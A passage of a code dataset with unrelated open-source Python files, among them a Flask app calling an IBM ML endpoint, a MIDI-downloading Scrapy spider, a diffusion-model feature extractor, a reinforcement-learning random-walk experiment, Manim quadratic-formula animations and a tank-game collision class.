the array(s) of values to be scored in the next line\n payload_scoring = {\"input_data\": [{\"fields\": [\"case\", \"symptoms_start_date\", \"diagnosys_date\",\n \"city\", \"locality\", \"age\", \"age_unit\", \"sex\", \"contagion_type\", \"current_location\" ], \"values\": userInput }]}\n\n response_scoring = requests.post(\"https://us-south.ml.cloud.ibm.com/ml/v4/deployments//predictions?version=\", json=payload_scoring, headers={'Authorization': 'Bearer ' + mltoken})\n\n output = json.loads(response_scoring.text)\n\n\n form.abc = \"\"\n if 'predictions' in output.keys():\n ab = output['predictions']\n for key in ab[0]:\n bc = ab[0][key]\n # form.abc = roundedCharge # this returns the response back to the front page\n form.abc = bc[0][0] # this returns the response back to the front page\n \n return render_template('index.html', form=form)","repo_name":"mileruiz/IBM-autoAI","sub_path":"web-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36426525877","text":"#!/usr/bin/env python3\nimport connexion\nfrom connexion.resolver import RestyResolver\nfrom bbidder.utils.logger import logger\n\n\ndef main():\n app = connexion.App(__name__, specification_dir='swagger/')\n app.add_api('bluebananabidder.yaml', resolver=RestyResolver('bbidder.api'))\n application = app.app\n\n # run our standalone server\n logger.info('Starting BlueBanana\\'s Bidder ...')\n app.run(port=5000, server='gevent')\n\nif __name__ == '__main__':\n main()\n","repo_name":"ddamianidis/BlueBananaBidder","sub_path":"bbidder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36722326339","text":"#!/usr/bin/env python3\n\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport json\nimport os\nimport requests\nfrom multiprocessing.pool import Pool\n\nDL_URLS = [\n 'https://synthesiamaniac.com/downloads/animal-crossing/',\n 'https://synthesiamaniac.com/downloads/cave-story/',\n 
'https://synthesiamaniac.com/downloads/donkey-kong/',\n 'https://synthesiamaniac.com/downloads/final-fantasy/',\n 'https://synthesiamaniac.com/downloads/legend-of-zelda/',\n 'https://synthesiamaniac.com/downloads/star-fox/',\n 'https://synthesiamaniac.com/downloads/medleys/',\n 'https://synthesiamaniac.com/downloads/more-games/',\n 'https://synthesiamaniac.com/downloads/miscellaneous/'\n]\nMIDI_URL_JSON = os.path.join(os.getcwd(), 'midi_urls.json')\nDL_DIR = os.path.join(os.getcwd(), 'midis')\nDL_INSTANCES = 4\n\ndef main():\n fetch_midi_urls()\n download_midis()\n\nclass synthesiamaniacDL(scrapy.Spider):\n\n name = \"synthesiamanicDL\"\n\n def start_requests(self):\n urls = DL_URLS\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n midi_sections = response.xpath('//div[contains(@class, \"czr-wp-the-content\")]/div[contains(@class, \"wp-block-pb-accordion-item\")]')\n for section in midi_sections:\n section_name = section.xpath('h4/text()')[0].get()\n midi_urls = section.xpath('div[contains(@class, \"c-accordion__content\")]/table/tr/td[contains(@class, \"midi-download\")]/a/@href').getall()\n yield {\n 'name': section_name,\n 'urls': midi_urls\n }\n\ndef fetch_midi_urls(export_name=MIDI_URL_JSON):\n if os.path.isfile(export_name):\n os.remove(export_name)\n process = CrawlerProcess(\n settings={\n \"FEEDS\": {\n export_name: {\"format\": \"json\"},\n },\n }\n )\n process.crawl(synthesiamaniacDL)\n process.start()\n process.join()\n\ndef download_midis(midi_url_json=MIDI_URL_JSON, dl_dir=DL_DIR, dl_instances=DL_INSTANCES):\n print('Starting to download the MIDIs now...')\n downloader_pool = Pool(dl_instances)\n with open(midi_url_json, 'rb') as infile:\n midi_url_map = json.load(infile)\n for section in midi_url_map:\n section_dir = os.path.join(dl_dir, section['name'])\n os.makedirs(section_dir, exist_ok=True)\n for url in section['urls']:\n midi_path = os.path.join(section_dir, url[url.rfind('/')+1:])\n if not os.path.isfile(midi_path):\n downloader_pool.apply(download_file, (url, midi_path))\n downloader_pool.close()\n downloader_pool.join()\n print('All MIDIs have been downloaded!')\n\ndef download_file(url, path, retry=3):\n print(\"Downloading: \" + url + \" to \" + path)\n attempts = 0\n while attempts < retry:\n try:\n r = requests.get(url, allow_redirects=True, timeout=5, stream=True)\n if r.status_code == 200:\n size = int(r.headers.get('Content-Length'))\n with open(path+\".part\", 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n f.write(chunk)\n os.rename(path+\".part\", path)\n print(\"Downloaded: \" + path)\n break\n else: attempts += 1\n except Exception as e:\n attempts += 1\n print(e)\n if attempts == retry - 1:\n print(\"Could not download: \" + url)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"retrontology/scrapy-downloaders","sub_path":"sythensia-maniac/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40465816502","text":"from typing import Any\nfrom typing import Dict\n\nDEFAULT_ENDPOINT_URL = \"/20160918\"\n\n\nasync def gather(hub, profiles) -> Dict[str, Any]:\n sub_profiles = {}\n for (\n profile,\n ctx,\n ) in profiles.get(\"oci\", {}).items():\n endpoint_url = f\"{ctx.get('endpoint_url').replace('{region_name}', ctx.get('region')).rstrip(DEFAULT_ENDPOINT_URL)}{DEFAULT_ENDPOINT_URL}\"\n sub_profiles[profile] = dict(\n endpoint_url=endpoint_url,\n 
compartment_id=ctx.get(\"compartment\"),\n api_key=f\"{ctx.get('tenancy_ocid')}/{ctx.get('user_ocid')}/{ctx.get('fingerprint')}\",\n )\n return sub_profiles\n","repo_name":"35thelement/bromine-oci-idem","sub_path":"idem_oci_instance/acct/oci/default_auth.py","file_name":"default_auth.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4086920936","text":"import sys\nimport torch\nfrom torch import nn\nfrom typing import List\nfrom diffusion_utils.diffusion_multinomial import index_to_log_onehot,log_onehot_to_index\n\n\n# device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef create_feature_extractor(model_type, **kwargs):\n \"\"\" Create the feature extractor for architecture. \"\"\"\n if model_type == 'ddpm':\n print(\"Creating DDPM Feature Extractor...\")\n feature_extractor = FeatureExtractorDDPM(**kwargs)\n # elif model_type == 'mae':\n # print(\"Creating MAE Feature Extractor...\")\n # feature_extractor = FeatureExtractorMAE(**kwargs)\n # elif model_type == 'swav':\n # print(\"Creating SwAV Feature Extractor...\")\n # feature_extractor = FeatureExtractorSwAV(**kwargs)\n # elif model_type == 'swav_w2':\n # print(\"Creating SwAVw2 Feature Extractor...\")\n # feature_extractor = FeatureExtractorSwAVw2(**kwargs)\n else:\n raise Exception(f\"Wrong model type: {model_type}\")\n return feature_extractor\n\ndef save_tensors(module: nn.Module, features, name: str):\n \"\"\" Process and save activations in the module. \"\"\"\n if type(features) in [list, tuple]:\n features = [f.detach().float() if f is not None else None \n for f in features]\n setattr(module, name, features)\n elif isinstance(features, dict):\n features = {k: f.detach().float() for k, f in features.items()}\n setattr(module, name, features)\n else:\n setattr(module, name, features.detach().float())\n\n\ndef save_out_hook(self, inp, out):\n save_tensors(self, out, 'activations')\n return out\n\n\ndef save_input_hook(self, inp, out):\n save_tensors(self, inp[0], 'activations')\n return out\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, model_path: str, input_activations: bool, **kwargs):\n ''' \n Parent feature extractor class.\n \n param: model_path: path to the pretrained model\n param: input_activations: \n If True, features are input activations of the corresponding blocks\n If False, features are output activations of the corresponding blocks\n '''\n super().__init__()\n self._load_pretrained_model(model_path, **kwargs)\n print(f\"Pretrained model is successfully loaded from {model_path}\")\n self.save_hook = save_input_hook if input_activations else save_out_hook\n self.feature_blocks = []\n\n def _load_pretrained_model(self, model_path: str, **kwargs):\n pass\n\nclass FeatureExtractorDDPM(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained DDPMs.\n \n :param steps: list of diffusion steps t.\n :param blocks: list of the UNet decoder blocks.\n '''\n \n def __init__(self, steps: List[int], blocks: List[int], **kwargs):\n super().__init__(**kwargs)\n self.steps = steps\n \n # Save decoder activations\n for idx, block in enumerate(self.model._denoise_fn.ups):\n print(idx)\n if idx in blocks:\n block[2].register_forward_hook(self.save_hook)\n self.feature_blocks.append(block[2])\n for idx, block in enumerate([self.model._denoise_fn.mid_block2]):\n print(idx)\n if idx in blocks:\n block.register_forward_hook(self.save_hook)\n self.feature_blocks.append(block)\n \n\n def 
_load_pretrained_model(self, model_path, **kwargs):\n from layers.layers import SegmentationUnet\n from diffusion_utils.diffusion_multinomial import MultinomialDiffusion\n\n # models: UNet and Diffusion \n # UNet is used to gather activations\n # Diffusion is used to get noisy samples\n unet = SegmentationUnet(\n num_classes=kwargs['num_classes'],\n dim=kwargs['dim'],\n num_steps=kwargs['num_steps'],\n dim_mults=kwargs['dim_mults']\n )\n\n self.model = MultinomialDiffusion(\n num_classes=kwargs['num_classes'],\n shape=kwargs['shape'],\n denoise_fn=unet,\n timesteps=kwargs['num_steps']\n ).to(kwargs['device'])\n\n dict = torch.load(model_path)\n self.model.load_state_dict(dict['model'])\n self.model.eval()\n\n @torch.no_grad()\n def forward(self, x, noise=None):\n activations = []\n for t in self.steps:\n # Compute x_t and run DDPM\n t = torch.tensor([t]).to(x.device)\n log_x_start = index_to_log_onehot(x, num_classes=2)\n log_x_t = self.model.q_sample(log_x_start=log_x_start, t=t)\n x_t = log_onehot_to_index(log_x_t)\n \n self.model._denoise_fn(x=x_t, time=t)\n\n # Extract activations\n for block in self.feature_blocks:\n activations.append(block.activations)\n block.activations = None\n\n # Per-layer list of activations [N, C, H, W]\n return activations\n \n\ndef collect_features(args, activations: List[torch.Tensor], sample_idx=0):\n \"\"\" Upsample activations and concatenate them to form a feature tensor \"\"\"\n assert all([isinstance(acts, torch.Tensor) for acts in activations])\n size = tuple(args['shape'][1:])\n resized_activations = []\n for feats in activations:\n feats = feats[sample_idx][None]\n feats = nn.functional.interpolate(\n feats, size=size, mode=args[\"upsample_mode\"]\n )\n resized_activations.append(feats[0])\n \n return torch.cat(resized_activations, dim=0)","repo_name":"gracious-patience/voxel_segmentation","sub_path":"multinomial_diffusion/segmentation_diffusion/src/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33406274504","text":"from ulakbus.models import Ceza\nfrom zengine.lib.test_utils import BaseTestCase\nfrom ulakbus.models import Personel\n\n\nclass TestCase(BaseTestCase):\n\n def test_idari_cezalar_takibi(self):\n personel_id = \"OI3vq7rWIaTdSNUj4KwSBpeHMrc\"\n personel = Personel.objects.get(personel_id)\n\n self.prepare_client('/idari_cezalar_takibi', username='personel_isleri_1')\n self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\", wf=\"idari_cezalar_takibi\")\n\n\n ceza_sayisi = Ceza.objects.filter(personel = personel).count()\n\n # Yeni Ceza Ekleme\n\n self.client.post(form={\"add\": 1}, cmd='add_edit_form')\n resp = self.client.post(form={\"iptal\": 1}, cmd='iptal')\n assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi\n\n resp = self.client.post(form={\"add\": 1}, cmd='add_edit_form')\n\n assert resp.json['forms']['schema']['title'] == 'İdari Ceza'\n\n yeni_idari_ceza_form = {'acilis_tarihi': \"17.01.2017\",\n 'baslama_tarihi': \"17.01.2017\",\n 'bitis_tarihi': \"18.01.2017\",\n 'dosya_sira_no': \"12345\",\n 'ihbar_sikayet_suc_ogrenildigi_tarih': \"10.01.2017\",\n 'kararin_teblig_tarihi': \"19.01.2017\",\n 'dusunceler': \"Dusunce Denemesi\",\n 'kaydet': 1}\n\n resp = self.client.post(form=yeni_idari_ceza_form)\n assert resp.json['msgbox']['title'] == \"İdari Ceza Oluşturuldu\"\n assert 
yeni_idari_ceza_form['dosya_sira_no'] in resp.json['msgbox']['msg']\n        assert 'oluşturuldu' in resp.json['msgbox']['msg']\n\n        assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n        ceza_object = Ceza.objects.filter(personel=personel, dosya_sira_no='12345')[0]\n\n        # Editing the penalty information\n\n        self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n                         object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n                         cmd=\"add_edit_form\")\n\n        resp = self.client.post(form={\"iptal\": 1}, cmd='iptal')\n        assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n        assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n        yeni_idari_ceza_form['dusunceler'] = \"Deneme Dusuncesi\"\n        yeni_idari_ceza_form['object_key'] = ceza_object.key\n\n        resp = self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n                                object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n                                cmd=\"add_edit_form\")\n\n        assert resp.json['forms']['schema']['title'] == 'İdari Ceza'\n        assert resp.json['forms']['model']['dusunceler'] == 'Dusunce Denemesi'\n\n        resp = self.client.post(cmd='add_edit_form',\n                                form=yeni_idari_ceza_form,\n                                model=\"Ceza\",\n                                wf=\"idari_cezalar_takibi\")\n\n        assert resp.json['msgbox']['title'] == \"Değişiklikleriniz Kaydedildi\"\n        assert personel.__unicode__() in resp.json['msgbox']['msg']\n        assert 'kaydedildi' in resp.json['msgbox']['msg']\n\n        assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n        # Viewing the penalty information\n\n        resp = self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n                                object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n                                cmd=\"goruntule\")\n\n        assert personel.__unicode__() in resp.json['object_title'] and ceza_object.dosya_sira_no in resp.json['object_title']\n        assert 'Deneme Dusuncesi' in resp.json['object'].values()\n        assert resp.json['object']['Dosya No'] == ceza_object.dosya_sira_no\n\n        resp = self.client.post(form={\"tamam\": 1}, cmd='iptal')\n\n        assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n        assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n        # Deleting the penalty\n\n        self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n                         object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n                         cmd=\"delete\")\n\n        resp = self.client.post(form={\"hayir\": 1}, cmd='iptal')\n        assert resp.json['forms']['schema']['title'] == 'İdari Cezalar'\n        assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi + 1\n\n        resp = self.client.post(id=personel_id, model=\"Ceza\", param=\"personel_id\",\n                                object_id=ceza_object.key, wf=\"idari_cezalar_takibi\",\n                                cmd=\"delete\")\n\n        assert resp.json['forms']['schema']['title'] == \"İdari Ceza Silme İşlemi\"\n        assert personel.ad in resp.json['forms']['form'][0]['helpvalue']\n        assert yeni_idari_ceza_form['dosya_sira_no'] in resp.json['forms']['form'][0]['helpvalue']\n\n        resp = self.client.post(form={\"evet\": 1}, cmd='delete')\n        assert resp.json['msgbox']['title'] == \"Silme İşlemi Başarılı\"\n        assert personel.__unicode__() in resp.json['msgbox']['msg']\n        assert yeni_idari_ceza_form['dosya_sira_no'] in resp.json['msgbox']['msg']\n        assert 'silindi' in resp.json['msgbox']['msg']\n        assert Ceza.objects.filter(personel=personel).count() == ceza_sayisi\n\n        
ceza_object.blocking_delete()","repo_name":"zetaops/ulakbus","sub_path":"tests/test_idari_cezalar_takibi.py","file_name":"test_idari_cezalar_takibi.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"tr","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"73726486224","text":"\"\"\"sevilla_vuela URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom main import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.inicio),\n path('inicio/', views.inicio),\n path('inicio.html/', views.inicio),\n path('about_us/', views.about),\n path('vuelos/', views.listar_vuelos),\n path('llegadas/', views.listar_llegadas),\n path('salidas/', views.listar_salidas),\n path('codeshare/', views.codigo_vuelos),\n path('aerolineas/', views.listar_aerolineas),\n path('aerolineas/', views.listar_llegadas_salidas),\n path('refresh/', views.refrescar),\n\n]\n","repo_name":"alexaur97/sevilla_vuela","sub_path":"sevilla_vuela/sevilla_vuela/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22070880822","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[35]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm_notebook as tqdm\n\n\n# In[36]:\n\n\nnum_states = 7\nterminal_states = [0, 6]\nalpha = 0.1\nstart_state = 3\nnum_episodes = 101\ndiscount = 1\ntrue_values = np.arange(0, 7)\ntrue_values = true_values/6\ntrue_values[6] = 0\n\n\n# In[37]:\n\n\ndef initializeV():\n V = np.zeros(num_states)\n for i in range(num_states):\n if i in terminal_states:\n continue\n V[i] = 0.5\n return V\n\ndef choose_action():\n prob = np.random.random()\n if (prob > 0.5):\n return 1\n return -1\n\ndef take_step(s, action):\n new_s = s + action\n if new_s == 6:\n return new_s, 1\n return new_s, 0\n\n\n# In[38]:\n\n\ndef td0(num_episodes):\n# print(alpha)\n V = initializeV()\n rmse_episode = np.zeros(num_episodes)\n for i in range(num_episodes):\n if i in episodes:\n plt.plot(V[1:6], label = str(i))\n s = start_state\n while True:\n action = choose_action()\n s_dash, reward = take_step(s, action)\n V[s] += alpha*(reward + discount*V[s_dash] - V[s])\n s = s_dash\n if s in terminal_states: \n break\n rmse_episode[i] = np.sqrt(np.sum(np.power(true_values - V, 2))/5.0)\n return rmse_episode\n\n\n# In[42]:\n\n\nepisodes = [0, 1, 10, 100]\nV = initializeV()\ntrue_values = np.arange(0, 7)\ntrue_values = true_values/6\ntrue_values[6] = 0\nplt.figure()\nplt.plot(true_values[1:6], label = \"True\")\ntd0(101)\nplt.legend()\nplt.show()\n\n\n# In[43]:\n\n\narr_td = []\nnum_runs = 100\nepisodes = [0, 1, 10, 100]\nalpha_array_td = [0.1, 0.15, 0.05]\nplt.figure()\nfor alpha_ in alpha_array_td:\n rmse_runs = np.zeros(num_episodes)\n alpha = alpha_\n for run in range(num_runs): \n rmse = td0(num_episodes)\n 
rmse_runs += rmse\n rmse_runs/=num_runs\n arr_td.append(rmse_runs)\n\n\n# In[44]:\n\n\ndef alpha_mc(num_episodes):\n# print(alpha)\n V = initializeV()\n rmse_episode = np.zeros(num_episodes)\n for i in range(num_episodes):\n episode_cache = []\n s = start_state\n# episode_cache.append(s)\n while True:\n action = choose_action()\n s_dash, reward = take_step(s, action)\n episode_cache.append(s)\n s = s_dash\n if s in terminal_states: \n break\n g = 0\n if (episode_cache[-1] == 6):\n g = 1\n for state in episode_cache:\n V[state] += alpha * (reward - V[state])\n rmse_episode[i] = np.sqrt(np.sum(np.power(true_values - V, 2))/5.0)\n return rmse_episode\n\n\n# In[45]:\n\n\narr = []\nnum_runs = 100\nalpha_array_mc = [0.01, 0.02, 0.03, 0.04]\nfor alpha_ in alpha_array_mc:\n rmse_runs = np.zeros(num_episodes)\n alpha = alpha_\n for run in range(num_runs): \n rmse = alpha_mc(num_episodes)\n# print(x)\n rmse_runs += rmse\n rmse_runs/=num_runs\n arr.append(rmse_runs)\n\n\n# In[48]:\n\n\nplt.figure()\nnum = 0\nfor rmse in arr:\n plt.plot(rmse, label = \"MC alpha = \" + str(alpha_array_mc[num]))\n num += 1\nnum = 0\nfor rmse in arr_td:\n plt.plot(rmse, label = \"TD alpha = \" + str(alpha_array_td[num]))\n num += 1\nplt.legend()\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"abhishekag03/RL-M2019","sub_path":"HW3/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73785470547","text":"import os\nimport argparse\nimport open3d as o3d\nfrom tqdm import tqdm\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--filedir', required=True)\n parser.add_argument('--max_display')\n args = parser.parse_args()\n\n files = os.listdir(str(args.filedir))\n files = sorted(files)\n\n if args.max_display is None:\n max_display = int(10)\n else:\n max_display = int(args.max_display)\n\n if len(files) >= max_display:\n files = files[:max_display]\n\n meshes = []\n \n for idx, file in tqdm(enumerate(files)):\n filepath = os.path.join(str(args.filedir), file)\n mesh = o3d.io.read_triangle_mesh(filepath)\n mesh.compute_vertex_normals()\n mesh.compute_triangle_normals()\n mesh.paint_uniform_color([0.5, 0.5, 0.5])\n mesh = mesh.translate((((idx % 5) * 0.3), ((idx // 5) * 0.35 * (-1)), 0))\n meshes.append(mesh)\n \n o3d.visualization.draw_geometries(meshes, mesh_show_back_face=True)\n","repo_name":"ariefpurnamamuharram/IF5171_Open3D","sub_path":"visualizer_mesh.py","file_name":"visualizer_mesh.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4776244046","text":"__author__ = 'sen'\n\nimport os\n\nfrom flask import Flask, make_response\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n \"\"\"\n\n \"\"\"\n current_dir = os.path.dirname(__file__)\n current_dir_abs = os.path.abspath(current_dir)\n app_path = os.path.join(current_dir_abs, 'index.html')\n\n assert os.path.exists(app_path), 'Does not exist: %s' % app_path\n return make_response(open(app_path).read())\n","repo_name":"lejkos/sunshine","sub_path":"test/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30272615560","text":"#!/usr/bin/env python3\n\n\"\"\"Simple code for get a contour from a 2D grid of points.\"\"\"\n\nimport copy\nfrom matplotlib import pyplot 
as plt\n\n\ndef getContour(xpts,ypts,zpts,levels):\n \"\"\"\n Use pyplot tricontour method to obtain contour curves in a 2D plane.\n\n :return: A dictionary with a list of contours for each level\n \"\"\"\n fig = plt.figure()\n x = copy.deepcopy(xpts)\n y = copy.deepcopy(ypts)\n z = copy.deepcopy(zpts)\n CS = plt.tricontour(x,y,z,levels=levels)\n levelPts = {}\n for il,level in enumerate(CS.levels):\n levelPts[level] = []\n c = CS.collections[il]\n paths = c.get_paths()\n for path in paths:\n levelPts[level].append(path.vertices)\n plt.close(fig)\n\n return levelPts\n","repo_name":"andlessa/RDM","sub_path":"myCheckMate2Files/validation/validation_plots/getContour.py","file_name":"getContour.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32195900936","text":"from manim import *\n\n\nclass OtherQuad(Scene):\n def construct(self):\n other = Text('The other quadratic equation:').shift(UP*2)\n other_quad = MathTex(r'\\frac{\\frac{-b}{2}\\pm\\sqrt{\\frac{b^2}{4}-ac}}{a}')\n self.play(Write(other))\n self.wait(1)\n self.play(Write(other_quad))\n other_quad2 = MathTex(r' = \\frac{\\frac{-b}{2}\\pm\\sqrt{\\frac{1}{4}(b^2-4ac)}}{a}').next_to(other_quad)\n self.play(Write(other_quad2))\n gr = VGroup(other_quad, other_quad2)\n self.play(gr.animate.shift(LEFT*5))\n other_quad3 = MathTex(r'= \\frac{\\frac{-b}{2}\\pm\\frac{1}{2}\\sqrt{b^2-4ac}}{a}').next_to(gr)\n self.play(Write(other_quad3))\n other_quad3_1 = MathTex(r'= \\frac{\\frac{-b}{2}\\pm\\frac{\\sqrt{b^2-4ac}}{2}}{a}').next_to(gr)\n self.play(TransformMatchingTex(other_quad3, other_quad3_1))\n other_quad4 = MathTex(r' = \\frac{-b\\pm\\sqrt{b^2-4ac}}{2a}').shift(DOWN*2)\n self.play(Write(other_quad4))\n\nclass Conclusion(Scene):\n def construct(self):\n conc = Text('Therefore, the other one works as well,\\n and is easier for even b\\'s.')\n self.play(Write(conc))\n\nclass SimplerQuad(Scene):\n def construct(self):\n quad = MathTex(r'ax^2 + bx + c').shift(UP*3)\n self.play(Write(quad))\n self.play(quad.animate.shift(LEFT*2))\n self.wait(1)\n quad2 = MathTex(r\"= x^2 + b'x + c'\").next_to(quad)\n self.play(Write(quad2))\n deriv = MathTex(r\"(x-r)(x-s) = 0\")\n deriv1 = MathTex(r\"x^2 - (r+s)x + rs = 0\").shift(DOWN)\n self.play(Write(deriv))\n self.wait(1)\n self.play(Write(deriv1))\n self.wait(1)\n derivgroup = VGroup(deriv, deriv1)\n self.play(derivgroup.animate.shift(UP*2))\n therefore = Tex('Therefore, ').set_color_by_tex('Therefore', BLUE)\n self.play(Write(therefore))\n bprime = MathTex(r\"-(r+s) = b'\").shift(DOWN)\n cprime = MathTex(r\"rs = c'\").shift(DOWN*2)\n self.play(Write(bprime))\n self.wait(1)\n self.play(Write(cprime))\n primegroup = VGroup(bprime, cprime)\n rect = SurroundingRectangle(primegroup)\n primegroup2 = VGroup(primegroup, rect)\n self.play(Create(rect))\n self.play(Uncreate(therefore))\n self.play(Unwrite(deriv))\n self.play(Unwrite(deriv1))\n self.play(Unwrite(quad))\n self.play(Unwrite(quad2))\n self.play(primegroup2.animate.shift(UP*4))\n\nclass Visual(Scene):\n def construct(self):\n plane = NumberPlane(\n axis_config={\n \"label_direction\": DL - (3 * LEFT / 4)\n },\n y_axis_config={\n \"label_direction\": DL\n },\n faded_line_ratio=2\n )\n plane.add_coordinates()\n self.add(plane)\n self.wait(1)\n graph = plane.plot(lambda x: x**2 - 4, x_range=[-6, 6], use_smoothing=False, color=BLUE)\n self.play(Create(graph))\n coordinate = Dot(point=ORIGIN).shift(RIGHT*2)\n label = 
Text('s').next_to(coordinate).shift(DOWN*0.2, LEFT*0.2)\n self.play(Create(coordinate))\n self.play(Write(label))\n self.wait(1)\n coordinate2 = Dot(point=ORIGIN).shift(LEFT*2)\n label2 = Text('r').next_to(coordinate2).shift(DOWN*0.3, LEFT*0.7)\n self.play(Create(coordinate2))\n self.play(Write(label2))\n coordinate3 = Dot(point=ORIGIN)\n label3 = Text('m').next_to(coordinate3).shift(DOWN*0.5)\n self.play(Create(coordinate3))\n self.play(Write(label3))\n braceline = Line(coordinate3, coordinate)\n bracelabel= BraceLabel(braceline, 'm+d', UP)\n braceline2 = Line(coordinate3, coordinate2)\n bracelabel2 = BraceLabel(braceline2, 'm-d', UP)\n self.play(Create(bracelabel))\n self.play(Create(bracelabel2))\n sols = MathTex(r\"(m-d)(m+d) = c'\").shift(UP*2, RIGHT*4.6)\n sols2 = MathTex(r\"= m^2 - d^2 = c'\").shift(UP, RIGHT*4.5)\n sols2_1 = MathTex(r\"d^2 = m^2 - c'\").shift(UP, RIGHT*4.5)\n self.play(Write(sols))\n self.play(Write(sols2))\n self.play(ReplacementTransform(sols2, sols2_1))\n sols2_2 = MathTex(r\"d = \\sqrt{m^2 - c}\").shift(UP, RIGHT*4.5)\n self.play(ReplacementTransform(sols2_1, sols2_2))\n m = MathTex(r\"m = \\frac{r+s}{2}\").shift(DOWN, RIGHT*4.5)\n self.play(Write(m))\n m2 = MathTex(r\"m = \\frac{-b'}{2}\").shift(DOWN, RIGHT*4.5)\n self.play(ReplacementTransform(m, m2))\n x = MathTex(r\"x = m \\pm d\").shift(DOWN*2, RIGHT*4.5)\n self.play(Write(x))\n simpquad = VGroup(m2, x, sols2_2)\n quadrect = SurroundingRectangle(simpquad)\n self.play(Create(quadrect))\n","repo_name":"Sri-SriPod/manimations","sub_path":"quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20709493338","text":"from util.local import *\nimport pygame\nfrom base.view import *\n\nclass MoveAble:\n \"\"\"\n 可以移动的控件: 我方坦克 和 敌方坦克 子弹\n 功能:\n 1.碰撞检测\n 2.通知运动物和阻挡物\n \"\"\"\n def hasCollision(self,block):\n\n # 记录当前的坐标\n x = self.x\n y = self.y\n\n # 预判下一步的轨迹\n # 预判下一步\n if self.direction == Direction.UP:\n y -= self.speed\n elif self.direction == Direction.DOWN:\n y += self.speed\n elif self.direction == Direction.LEFT:\n x -= self.speed\n elif self.direction == Direction.RIGHT:\n x += self.speed\n\n # 坦克矩形\n selfRect = pygame.Rect(x,y,self.width,self.height)\n # block矩形\n blockRect = pygame.Rect(block.x,block.y,block.width,block.height)\n\n\n # 同时对越界进行处理\n return selfRect.colliderect(blockRect) or x <0 or y<0 or x> WIDTH-self.width or y> HEIGHT - self.height\n\n\n def notifyCollision(self):\n pass","repo_name":"lq-debuger/TankGame","sub_path":"base/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74318741266","text":"import numpy as np\nimport sys\n\n\nin_base_path = 'data/mnist/'\nout_base_path = 